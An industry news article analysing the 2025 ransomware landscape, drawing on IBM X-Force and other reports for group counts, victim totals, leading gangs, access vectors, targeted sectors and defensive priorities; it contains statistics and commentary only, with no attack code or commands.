The ransomware ecosystem did not shrink in 2025. It exploded. IBM’s X-Force Threat Intelligence Index 2026, published February 25, found 109 distinct extortion groups operating worldwide during the year, up from 73 in 2024. That 49 percent year-over-year jump is the sharpest single-year expansion in the modern ransomware era. At the same time, global victims reached 8,159 (Picus Security) while independent tallies from Comparitech, Searchlight Cyber, and Ransomware.live converge near 7,400-7,900, all pointing to a landscape more active than any prior year on record. The headline figures mask a structural shift: the ecosystem no longer bends around a few dominant brands. It has fractured into dozens of smaller, faster, harder-to-attribute operations, and that fragmentation is making defense harder, not easier.
The 49% Surge: One Number, a Structural Shift
IBM’s X-Force researchers tracked the rise from 73 active groups in 2024 to 109 in 2025, an increase the team attributes to two forces converging at once: lower barriers to entry and a supply glut of recycled tooling from disrupted gangs. When law enforcement dismantled major operations such as LockBit 3.0 and BlackCat/ALPHV, the source code, affiliate lists, and operational playbooks did not disappear. They leaked, were repurposed, or were auctioned inside closed forums, letting new operators spin up affiliate programs within weeks rather than months.
The X-Force report frames this explicitly: “The ransomware ecosystem is more fragmented than ever, with the dominance of attacks attributed to the top 10 groups dropping by 25 percent.” Put in concrete terms, the top 10 groups accounted for 71 percent of all published victims in Q1 2025 but only 56 percent by Q3, per data from SOC in a Box, which tracked leak-site postings throughout the year. Market share is dispersing to smaller actors who run low-volume campaigns, pick softer targets, and shut down before law enforcement can build a case.
Searchlight Cyber identified 73 new groups entering the space in 2025 alone. Emsisoft’s January 2026 report counted between 126 and 141 active groups depending on the measurement window, while BlackFog counted 130 groups executing attacks across the full year. The scale of new entrants is notable because it shows disruption of top-tier gangs is not reducing the number of attackers. It is democratizing ransomware.
“Law enforcement efforts are working,” the Emsisoft security research team wrote in its January 2026 State of Ransomware report. “They are fragmenting major groups, forcing shutdowns, and creating instability at the top. Yet this disruption has not translated into fewer victims. Instead, ransomware has become more decentralized, more competitive, and more resilient.”
Victim Counts: 8,159 Confirmed, One Claim Published Every 70 Minutes
The scale of activity in 2025 becomes clearer through frequency metrics. SOC in a Box calculated that, averaged across the year, a ransomware victim claim was published to a dark-web leak site approximately every 70 minutes. During the peak period in February 2025, when Cl0p’s MOVEit and early Oracle-exploitation batches coincided with high baseline activity from Qilin, RansomHub, and Akira, the pace dropped to one publication every 45 minutes.
From 2023 to 2025, the total global victim count grew 53 to 63 percent depending on the data source, per Emsisoft. The year-over-year jump from 2024 to 2025 was roughly 2,000 additional victims on the Picus Security count of 8,159. Rapid7, tracking Q2 2025 specifically, found 65 active groups during that quarter, with 96 unique groups operating across the full first half of the year, a 41.18 percent increase over the 68 seen in H1 2024.
The United Kingdom saw 251 victim claims across 2025, a figure that includes the Synnovis NHS laboratory services attack, which became the first ransomware incident formally confirmed as a contributing factor in a patient death. That finding, documented in an NHS review, shifts ransomware from a financial crime category into a public-safety category in ways that regulators and policymakers are still processing.
The Old Guard Collapses: LockBit, ALPHV, and the Succession Crisis
The two most dominant ransomware brands of 2022 to 2024 both entered visible decline by 2025. Operation Cronos, the February 2024 international law enforcement action, seized LockBit’s infrastructure and published the group’s internal data. LockBit’s administrator subsequently attempted a relaunch but its affiliate base had already scattered. The group’s share of global victim postings fell sharply through 2025 as new entrants absorbed former LockBit affiliates.
BlackCat/ALPHV executed what analysts called an exit scam in March 2024, shutting down its infrastructure and keeping an alleged $22 million ransom payment made by Change Healthcare rather than distributing affiliate cuts. The collapse of both major brands at roughly the same time left a power vacuum that RansomHub and Qilin moved aggressively to fill.
Smaller successor groups formed quickly. Researchers documented groups using modified LockBit code under new names, a pattern consistent with what IBM’s X-Force described as “smaller, transient operators” using “recycled playbooks and shifted identities to conduct opportunistic, low-volume attacks.” The lack of a dominant cartel, while superficially encouraging, creates attribution gaps that complicate both law-enforcement cases and corporate incident response.
RansomHub: 736 Victims, Then a Sudden Halt
RansomHub entered 2025 as the most prolific ransomware group in operation. Black Kite’s 2025 Ransomware Report recorded 736 disclosed victims as the group closed out 2024, the highest victim count of any single group that year. Bitsight estimated 534 attacks in 2024 and noted that the group had amassed more than 15,000 mentions on Telegram, a proxy for affiliate and buyer activity.
The group targeted manufacturing, healthcare, professional services, construction, and retail, with primary geographies in the United States, United Kingdom, Brazil, Italy, and Germany. Its median extortion demand was reported at $8 million, far above the ecosystem average, positioning it explicitly in the enterprise segment rather than the small-business opportunistic tier.
Then, on April 1, 2025, RansomHub’s client communication portal went offline. Dark Reading reported the group had halted operations, though whether this was a law-enforcement disruption, an internal dispute, or a deliberate rebrand was not confirmed at the time of publication. The vacuum created by RansomHub’s pause accelerated Qilin’s ascent to the top position in monthly victim counts.
Qilin Becomes the Most Active Group of 2025
Qilin, first observed in 2022, broke through in 2024 with roughly 200 victims (156 of them in the United States) before accelerating sharply in 2025. Picus Security named it the most active threat actor of the year. The group runs a Rust-based ransomware variant, which is notable because Rust-compiled malware is harder to analyze and reverse-engineer than legacy C++ or C-based payloads, complicating incident response timelines.
In April 2025, CYFIRMA tracked 72 Qilin victims in a single month, representing a 71.4 percent month-over-month increase from March. During that same month, 470 total victims were reported worldwide, meaning Qilin alone accounted for roughly 15 percent of global activity. Play ransomware posted a 75.9 percent increase in the same period, while Dragonforce grew 25 percent, suggesting a broad acceleration across the second tier of groups as RansomHub’s exit left affiliate pipelines available for other operators.
Cl0p’s Mass-Exploitation Strategy Defines the Year’s Worst Month
Cl0p continued its distinctive mass-exploitation model in 2025, targeting managed file transfer and enterprise software vulnerabilities to simultaneously compromise thousands of organizations rather than conducting individual intrusions. The February 2025 peak, when global attack publication rates hit one every 45 minutes, was driven partly by Cl0p exploiting both MOVEit follow-on vulnerabilities and early Oracle systems vulnerabilities in overlapping batches.
The Cl0p model matters as a strategic template because it does not require persistent access or prolonged network traversal. The group identifies a high-value enterprise software vulnerability, weaponizes it rapidly, and simultaneously exfiltrates data from large numbers of customers of the compromised platform. This approach is resistant to individual-enterprise defenses because the victim’s security controls are irrelevant if their vendor is the point of compromise. It is the logical evolution of what IBM X-Force found to be the ransomware ecosystem’s most dangerous new dynamic: supply chain and third-party exploitation, which has grown nearly fourfold since 2020.
Attack Vectors: Exploitation Overtakes Phishing for the First Time
IBM’s X-Force 2026 report documents a significant shift in how ransomware groups establish initial access. Exploitation of public-facing applications surged 44 percent year-over-year and accounted for 40 percent of all incidents observed in 2025. That displaces stolen or misused credentials, which accounted for 32 percent, from the top position they held for two consecutive years.
The driver is straightforward: X-Force tracked nearly 40,000 vulnerabilities in 2025, roughly 13,000 more than the prior year, and 56 percent of those disclosed vulnerabilities did not require authentication to exploit. When a flaw is unauthenticated and public-facing, any automated scanner can find it and any operator with a working exploit can use it, collapsing the skill floor for initial access.
A parallel finding from CrowdStrike complicates the picture further: 82 percent of all detections in 2025 were malware-free. Attackers increasingly use valid credentials and native operating system tools, a technique called living off the land, to move through networks after gaining access. Traditional antivirus and signature-based detection is largely blind to these methods because there is no malicious binary to flag.
“Attackers are exploiting basic security gaps at dramatically higher rates,” the IBM X-Force team wrote in the official 2026 report, “now accelerated by AI tools that help attackers identify weaknesses faster than ever.” The AI acceleration component matters because it compresses the time between vulnerability disclosure and weaponization, reducing the patch window that defenders historically relied on.
Industry Targets: Manufacturing Leads, Healthcare Climbs
Manufacturing held its position as the most targeted industry in 2025 for the third consecutive year, per IBM X-Force, accounting for 27.7 percent of all incidents observed. Financial services and insurance ranked second and third globally. The concentration on manufacturing reflects a strategic calculation: production line disruption creates immediate, measurable financial pressure that makes organizations more likely to pay quickly.
Healthcare’s position is more alarming than its rank suggests. Rapid7’s Q2 2025 analysis found healthcare accounting for 10.6 percent of ransomware postings, the second-highest share behind services. In April 2025, CYFIRMA found the manufacturing sector absorbed 72 ransomware incidents globally, with healthcare closely following. The Synnovis case in the UK, in which the NHS confirmed a direct link between a ransomware-caused blood supply disruption and a patient death, illustrates why healthcare ransomware carries a different weight than financial impact alone.
New groups emerging in Q2 2025 demonstrated the breadth of targeting: Rapid7 documented KaWa4096, Warlock, Devman, Nova, and Dire Wolf as net-new ransomware actors during that quarter alone. These groups have not yet established sector preferences that threat intelligence databases have catalogued, meaning organizations cannot rely on historical targeting patterns to assess their relative exposure.
Geographic Distribution: The US Absorbs 66% of Attacks
Rapid7’s Q2 2025 data shows the United States accounting for 66 percent of all ransomware postings, with the UK second at 6.7 percent, Canada third at 6.6 percent, Germany fourth at 4.2 percent, and Italy fifth at 3.2 percent. In raw numbers, CYFIRMA counted 224 attacks in the US in April 2025 alone, compared to 28 in Canada and 22 each in the UK and Germany.
IBM’s X-Force regional breakdown confirms the macro trend: North America accounted for 29 percent of all X-Force incident response cases in 2025, up from 24 percent in 2024. It is the first time in six years that North America has ranked as the most attacked region globally, overtaking Asia-Pacific (27 percent) and Europe (25 percent). The Middle East and Africa accounted for 10 percent, Latin America 9 percent.
The US concentration is partly a function of economic attractiveness: US organizations tend to have higher revenue and larger cyber-insurance coverage, both of which factor into ransomware operators’ payment-probability calculations. It also reflects the density of publicly exposed enterprise software and the large number of small and mid-size businesses that run unpatched legacy applications across industries that generate reliable cash flow.
Supply Chain and AI Credentials: The New Attack Surface
IBM’s X-Force identified a nearly fourfold increase in major supply chain and third-party compromises since 2020. The groups responsible for the most visible 2025 incidents in this category include Scattered Spider, LAPSUS$, and ShinyHunters, all of which IBM names as prolific drivers of supply chain intrusions. These groups exploit CI/CD pipelines, SaaS integration tokens, and trusted developer identities to propagate access downstream from a single vendor compromise to that vendor’s entire customer base.
IBM found that 72 percent of organizations could not produce a reliable software component inventory, which means most cannot determine whether a compromised vendor’s software is running in their environment at all. This inventory gap is not a new finding, but its consequence has grown sharper as supply chain attacks have scaled.
Additionally, IBM X-Force tracked more than 300,000 ChatGPT credential sets advertised on the dark web in 2025, a product of infostealer campaigns expanding their target lists to include AI service accounts. As organizations integrate AI agents into development and business workflows, those agent credentials become a new attack surface tied directly to supply chain risk. A compromised AI agent with access to internal code repositories or production APIs carries the same blast radius as a compromised human developer account.
Law Enforcement: Winning Battles, Not the Volume War
Operation Cronos against LockBit and the FBI/DOJ actions against ALPHV were genuine tactical successes. Infrastructure was seized, decryption keys were released, and in some cases administrators were indicted. The problem is structural: these actions demonstrate that disrupting a brand does not reduce the number of active attackers. Former affiliates migrate to new platforms within days.
Emsisoft’s researchers made this point plainly in their January 2026 analysis: “As long as affiliates remain plentiful and social engineering remains effective, victim counts are likely to continue rising.” Law enforcement disruption works best as a cost-raising mechanism for criminal operators rather than as a volume-reduction mechanism. It increases friction and raises the risk premium for specific individuals, but it does not shrink the ecosystem.
The US Federal Communications Commission’s 2026 data showed a fourfold increase in ransomware attacks on telecommunications businesses since 2021, prompting the FCC to formally urge telecoms to strengthen cybersecurity postures. Critical infrastructure operators now face explicit guidance rather than voluntary frameworks in some sectors, though enforcement mechanisms remain limited relative to the scale of the threat.
The AI Accelerant: Faster Exploitation, First Autonomous Campaign
AI’s role in ransomware in 2025 was primarily about compression: compressing the time between vulnerability disclosure and exploitation, compressing the time needed to generate convincing phishing lures, and compressing the skill barrier for running extortion operations. IBM’s X-Force pointed to AI tools helping attackers “identify weaknesses faster than ever” as a direct driver of the 44 percent jump in public-facing application exploitation.
Michael Freeman, head of threat intelligence at Armis, told SecurityWeek’s Cyber Insights 2026 series: “By mid-2026, at least one major global enterprise will fall to a breach caused or significantly advanced by a fully autonomous agentic AI system.” That prediction sits against a backdrop where, per the World Economic Forum’s Global Cybersecurity Outlook 2026, 87 percent of business leader respondents had already experienced rising AI-related vulnerabilities in 2025, and 94 percent expect AI to be the biggest force shaping cybersecurity in 2026.
SOC in a Box’s global analysis noted what it called “the first AI-assisted autonomous ransomware campaign” appearing in 2025. That milestone represents the inflection from AI as an assistant to attackers to AI as a partial replacement for attacker skill, a qualitative shift that security architects are still building threat models around. When AI can autonomously scan for vulnerable systems, generate spear-phishing content, and manage extortion negotiations, the economics of ransomware change: fewer skilled operators can manage more simultaneous campaigns, compressing dwell time and increasing the pace of victim publication.
Ransomware Groups and Victims 2023-2025: Year-Over-Year Comparison
| Year | Active Groups | Global Victims (est.) | YoY Victim Growth | Source |
|---|---|---|---|---|
| 2023 | ~70 | ~5,081 | Baseline | Emsisoft / Searchlight Cyber |
| 2024 | 73-94 | 5,631-5,728 | +11% | Comparitech / Emsisoft |
| 2025 | 109-141 | 7,419-8,159 | +32-42% | IBM X-Force / Picus / Comparitech |
Top Ransomware Groups 2025: Activity Comparison
| Group | 2024 Victims | 2025 Status | Primary Targets | Notable Trait |
|---|---|---|---|---|
| RansomHub | 736 | Paused (April 2025) | Manufacturing, Healthcare, Professional Services | Highest 2024 victim count; $8M median demand |
| Qilin | ~200 | Most active 2025 | Healthcare, Manufacturing, Finance | Rust-based variant; 71.4% spike in April 2025 |
| Cl0p | High (MOVEit) | Active: mass exploitation | Enterprise SaaS users | Single breach reaches thousands via vendor chain |
| Play | Moderate | Active; +75.9% April 2025 | Manufacturing, Technology | Double-extortion model |
| LockBit | High (pre-Cronos) | Fragmented post-takedown | All sectors | Affiliate diaspora fed dozens of successor groups |
| Akira | Moderate | Active | SMBs, Healthcare | Lower ransom demands, volume-based targeting |
| Dragonforce | Low | Growing; +25% April 2025 | Retail, Manufacturing | Expanding affiliate recruitment in 2025 |
5 Predictions for Ransomware Through 2027
1. Active group count crosses 150 by end of 2026. The trend line is clear: roughly 70 groups in 2023, 73-94 in 2024, 109-141 in 2025. The low barrier to entry, combined with leaked toolkits and a deep pool of experienced former affiliates, will continue feeding new entrants faster than law enforcement can remove established ones.
2. AI-assisted campaigns become the norm rather than the exception. The transition from AI-assisted to AI-autonomous campaigns will accelerate as large language model capabilities improve. Michael Freeman’s prediction about a major enterprise falling to a fully AI-driven breach by mid-2026 will serve either as a confirmed milestone or an early warning that arrives slightly later than anticipated, but the trajectory is not in dispute.
3. Healthcare regulatory pressure triggers mandatory cyber standards in the EU and US by 2027. The Synnovis patient-death finding is a legal and political watershed. Healthcare systems that cannot demonstrate ransomware resilience will face stricter regulatory penalties, minimum security requirements, and potential civil liability in at least one major jurisdiction within 24 months. The EU’s NIS2 Directive already covers essential health services; US legislation is moving in the same direction.
4. Supply chain becomes the dominant initial access vector by 2027. With public-facing application exploitation already surging 44 percent in 2025 and supply chain compromises up fourfold since 2020, the convergence of these two vectors (attackers exploiting vendor software vulnerabilities to reach downstream customers) will likely displace all other initial access categories within two years.
5. Ransom payment rates decline as cyber-insurance mandates improve baseline defenses. Insurers are responding to rising claims by requiring minimum security controls, including multi-factor authentication, endpoint detection, and immutable backups, before issuing policies. Organizations that meet these requirements are better positioned to recover without paying. Payment rates should decline gradually even as victim counts continue rising, because better-defended organizations experience lower leverage under extortion.
What Organizations Should Prioritize Now
The IBM X-Force 2026 report’s recommendations map directly to where attackers are finding the most success. With 56 percent of vulnerabilities requiring no authentication and a 44 percent surge in public-facing application attacks, the highest-return defensive investment for most organizations is patching externally accessible systems. X-Force researchers specifically called out “missing authentication controls” as a leading exploitable condition.
The shift to malware-free attacks (82 percent of CrowdStrike detections in 2025) points to the need for behavioral detection rather than signature-based tools. Organizations running only endpoint protection platforms that rely on known malware signatures will miss the majority of active intrusion techniques. Network traffic analysis, identity threat detection, and user and entity behavior analytics fill the gaps that signature detection leaves open.
Supply chain risk requires a different set of controls entirely. IBM found 72 percent of organizations could not inventory their software components, which means they cannot determine exposure when a vendor announces a compromise. Building a software bill of materials (SBOM) for critical systems, monitoring vendor security disclosures, and applying vendor access on a least-privilege basis are controls that reduce blast radius when, not if, a trusted third party is breached.
Related Coverage
For deeper context on the ecosystem feeding ransomware operations, see our analysis of Infostealers Stole 1.8B Credentials in 2025, which covers how credential theft pipelines supply the initial access brokers that ransomware groups rely on. The AI Cyberattacks: 90% Autonomous, 40K Flaws [2026] breakdown examines how AI tools are accelerating vulnerability discovery and attack automation, directly relevant to the 44 percent exploitation surge documented by IBM X-Force. The npm Supply Chain Attacks: 1.2M Malicious Packages [2026] piece covers the developer-ecosystem angle on third-party compromise, which IBM X-Force identifies as a key attack surface growing at a fourfold rate. For incident-level reporting on ShinyHunters, one of the three prolific supply-chain groups IBM named, see the Canvas Data Breach: 275M Hit by ShinyHunters and ShinyHunters Breach Odido: 6.5M Hit, €1M Ransom analyses. The Security pillar covers the full scope of defensive strategy across these threat categories.
Frequently Asked Questions
How many ransomware groups were active in 2025?
IBM X-Force identified 109 distinct extortion groups in 2025, up from 73 in 2024, a 49 percent increase. Emsisoft counted between 126 and 141 active groups depending on measurement methodology. Searchlight Cyber found 73 entirely new groups entered the ecosystem in 2025 alone, meaning the influx of new entrants exceeded the count of all groups active just two years prior.
What is the total number of ransomware victims in 2025?
Estimates vary by measurement method. Picus Security counted 8,159 victim organizations globally. Comparitech logged 7,419 victim claims on dark-web leak sites. Ransomware.live tracked 7,902 listings. All sources agree 2025 was the most active year on record, representing a 32-42 percent increase over 2024 depending on the source used.
Which ransomware group was most active in 2025?
Qilin became the most active group of 2025 according to Picus Security, accelerating after RansomHub’s operations paused in April. RansomHub had held the top position in 2024 with 736 disclosed victims. Qilin’s Rust-based variant and aggressive affiliate recruitment drove a 71.4 percent month-over-month spike in April 2025 alone.
Why is ransomware increasing despite law enforcement takedowns?
Disrupting a ransomware brand does not eliminate its affiliates. Former LockBit and ALPHV affiliates migrated to new platforms within days of those operations being disrupted. Leaked source code and playbooks lowered the technical barrier for new entrants. Emsisoft’s researchers found the ecosystem is now “more decentralized, more competitive, and more resilient” precisely because enforcement fragmented the dominant players without removing the underlying workforce or economic incentives.
What industries are targeted most by ransomware?
Manufacturing ranks first globally per IBM X-Force (27.7 percent of all incidents), followed by financial services and insurance. Healthcare ranked second in Q2 2025 per Rapid7, accounting for 10.6 percent of all postings. Services broadly (44.4 percent in Q2) led all categories in Rapid7’s quarterly count because the sector classification is wide, but healthcare and manufacturing face the most operationally disruptive attacks given their reliance on continuous uptime.
How are ransomware groups getting initial access in 2025?
Vulnerability exploitation became the leading initial access vector in 2025 for the first time, accounting for 40 percent of incidents per IBM X-Force. Attacks on public-facing applications surged 44 percent year-over-year. Stolen credentials accounted for 32 percent, down from the top position they held in prior years. The shift is driven by AI-assisted vulnerability discovery and the sheer volume of publicly disclosed flaws: nearly 40,000 in 2025, with 56 percent requiring no authentication to exploit.
What is the Synnovis ransomware case?
Synnovis is a UK NHS pathology services provider hit by the Qilin ransomware group in June 2024. The attack disrupted blood transfusion and testing services across NHS hospitals in London. An NHS review published in 2025 formally confirmed the disruption as a contributing factor in a patient death, making it the first ransomware incident to receive that designation in a UK health authority report. The case is reshaping how regulators classify ransomware attacks on healthcare infrastructure.
Sources: IBM X-Force Threat Intelligence Index 2026; IBM X-Force 2026 Press Release (PRNewswire); Emsisoft: State of Ransomware 2025; Rapid7 Q2 2025 Ransomware Trends; Picus Security: Top 10 Ransomware Groups of 2025; SOC in a Box: Global Ransomware 2025 Annual Analysis
